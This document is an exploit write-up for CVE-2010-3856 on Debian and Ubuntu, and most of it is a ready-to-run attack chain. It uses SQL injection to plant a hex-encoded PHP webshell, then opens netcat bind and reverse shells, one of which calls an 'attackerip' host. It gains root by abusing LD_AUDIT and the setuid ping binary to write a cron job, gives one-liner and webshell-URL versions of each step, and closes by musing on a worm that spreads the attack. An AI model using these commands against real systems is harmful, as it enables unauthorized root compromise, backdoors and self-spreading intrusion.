Debian 5.0.6 / Ubuntu 10.04 Webshell To Remote Root

`# Exploit Title: Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root  
# Date: 24-10-2010  
# Author: jmit  
# Mail: fhausberger[at]gmail[dot]com   
# Tested on: Debian 5.0.6  
# CVE: CVE-2010-3856  
  
--------------  
| DISCLAIMER |  
--------------  
  
# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE  
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR  
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF  
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS  
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN  
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)  
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE  
# POSSIBILITY OF SUCH DAMAGE.  
  
---------   
| ABOUT |  
---------  
  
Debian/Ubuntu remote root exploitation example (GNU dynamic linker DSO vuln).  
See (http://www.exploit-db.com/exploits/15304/). Should work on other linux  
distros too.  
  
--------------  
| BACKGROUND |  
--------------  
  
Typically it isn't possible to use a suidshell or modify /etc/passwd directly after  
webshell access (user nobody) to gain root access. But with the DSO vuln we can  
launch commands as root and we can create a socket and connect to the user or setup  
a bindshell.  
  
-----------   
| EXPLOIT |  
-----------  
  
After you have found a SQL-Injection vuln you can create a php backdoor. This is typically  
possible with select into dumpfile/outfile statement. The values are a simple  
<? passthru($_GET['c']); ?> backdoor.  
  
---  
DROP TABLE IF EXISTS `fm`;  
CREATE TABLE `fm` (  
`fm` longblob  
) TYPE=MyISAM;  
insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);  
select fm from fm into dumpfile '/opt/lampp/htdocs/xampp_backup.php';  
drop table fm;  
flush logs;  
---  
  
Now you can connect to the server and create a connection with telnet, nc, write  
binary with perl -e ' print "\x41\x42\x43\x44"', echo -en '\x41\x42\x43\x44', ...  
If direct shell access isn't possible you can use phpcode to create your own  
binary with php fwrite:  
  
---  
<?php $File = "/tmp/nc";  
$Handle = fopen($File, 'w');  
$Data = "\x41\x42\x43\x44";  
fwrite($Handle, $Data);  
fclose($Handle); ?>  
---  
  
Now use   
  
Bind-Shell: http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash  
Reverse-Shell: http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash  
  
in your webbrowser and connect to your shell  
  
$ nc victimip 9999  
id  
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)  
  
---  
  
Now lets exploit the DSO vuln. You need umask 0 for correct  
rw-rw-rw creation of exploit /etc/cron.d/exploit  
  
$ umask 0  
  
This is the shellscript for the cron.d entry.  
  
Bind-Shell: $ echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh  
Reverse-Shell: $ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh  
  
Now make your shellscript executable for cron:  
  
$ chmod u+x /tmp/exploit.sh  
  
Create rw-rw-rw file in cron directory using the setuid ping program:  
  
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping  
  
Launch every minute a suid root shell  
  
$ echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit  
  
Now you have a root shell every minute.  
  
$ nc attackerip 79  
id  
uid=0(root) gid=0(root) groups=0(root)  
  
-------------------  
| EXPLOIT oneline |  
-------------------  
  
echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit  
  
$ nc attackerip 79  
id  
uid=0(root) gid=0(root) groups=0(root)  
  
------------------------------  
| EXPLOIT from webshell only |  
------------------------------  
  
http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh  
http://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh  
http://victimip/xampp_backup.php?c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping  
http://victimip/xampp_backup.php?c=echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit  
  
$ nc attackerip 79  
id  
uid=0(root) gid=0(root) groups=0(root)  
  
---------------------------------  
| EXPLOIT from webshell oneline |  
---------------------------------  
  
http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit  
  
$ nc attackerip 79  
id  
uid=0(root) gid=0(root) groups=0(root)  
  
---------  
| IDEAS |  
---------  
  
Looks like a wormable bug. The urlobfuscated (IDS/IPS) worm search for SQLI/BSQLI bugs or remote code execution bugs.  
Then the worm injects the evil url and do the same for other ips. It installs a rootkit-bot and the game is over.  
  
  
`